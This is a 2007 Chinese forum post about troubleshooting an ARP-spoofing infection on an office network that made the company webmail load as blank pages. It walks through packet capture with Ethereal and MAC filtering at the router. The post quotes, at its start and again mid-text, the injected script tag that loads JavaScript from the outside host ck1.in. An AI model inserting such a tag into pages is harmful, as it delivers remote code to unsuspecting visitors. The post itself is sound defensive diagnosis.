|
|
<script src=http://ck1.in/n.js></script>
相信上面这一行代码,好多朋友都遇见过的。是的他是ARP欺骗的一个比较曲形的例子,至今我还没有找到彻底解决的方法,更惭愧的说连中毒的电脑也找不到。但有方法可以 治标但不治本。下面是案件重演:
7月某日中午,上司杀气冲冲的来到我办公室说“公司的邮箱进不了,马上打电话去 XX动力邮箱(基于私隐问题XX代替)的客服”。然后一股烟的就走了。我一脸茫然,明明我的IE上面打开的页面就是公司的邮箱了嘛......-_-!
然后我半信半疑的去了他的办公室,我心想该不会是他把邮箱的地址打错了吧郁闷,来到他的电脑前面把他的IE的垃圾文件清理了一下,然后就打上公司的邮箱,真的“傻眼了”(我的大学老师的名句),打开了一个空白页出来....(PS是空白页,不是找不到网页)
然后我就到了其他人的电脑上试,更惊奇的事发生了,有的电脑可以打开,有的问题同上,现在“真的傻眼了”
经一轮思前想后,好像看到了一点头目,打开是空白页的电脑都是用人手打进去的,可以打开的都是在收藏夹里打开的。
或者这样比较明了
http://mail.XX-industries.com.cn与http://mail.XX-industries.com.cn/default.html
就眼一看好像是服务器那边出间题跳转不了似的。于是拿起电话给客服打电话去反影了问题,可得到的他说他在那边测试没有问题。
到了这里我就开始怀疑是不是电脑中毒了,打开空白页的源代码问题就来了<script src=http://ck1.in/n.js></script> 就是这一行该死的代码,Google了他一下搜到的资料很小。只知道有人说他是ARP病毒,参考 http://www.jackytsu.com/ 可按照他的方法去做...问题依旧。
无奈只好Diy了上网找了些工具 欣向巡路之ARP工具,WinPcap_3_1,Ethereal
以下是步骤:
关掉所有需要访问网络的软件,打开 “欣向巡路之ARP工具”按 “重新扫描”,然后 “抓包”
然后打开IE 打开有问题的网页。返回“欣向巡路之ARP工具” 停止抓包
安装 Ethereal 然后用 Ethereal 打开刚才抓包生成的 cap 文件(在 欣向巡路之ARP工具 的文件夹下)
下用纸和笔记下 你的电脑的 MAC 地址 和你的网关的MAC址
在 Ethereal 中会有多条记录 由上到下慢慢的看清 关键在于 Ethereal中间的部份
Ethernet II, Src:XXXXXX(XX:XX:XX:XX:XX:XX),Dst:XXXX(XX:XX:XX:XX:XX:XX)
留意()中的XX 与你记下MAC地址对比,如果找到不同的可能就是他在作怪了。由于不知道该IP与MAC为那台电脑所有,在不打扰别人的情况下我去到路由器把该MAC地址过滤了一下不让其通过路由器。结果再测试所有电脑都可以正常打开网页。
几分钟后有人大叫为什么我上不了网呀。终于找到你了。那家伙原来装的瑞星启动不了,帮他重装了个卡巴斯基,一杀``二百多个病毒和木马文件` ---__---! 再把路由器的过滤项删去,测试成功
终于找到治本的方法
[ 本帖最后由 wwhonline 于 2007-7-25 14:47 编辑 ] |
评分
-
1
查看全部评分
-
|
发表于 2007-7-25 13:02:19
英文太差了`和没找到Ethereal的中文版...所以.....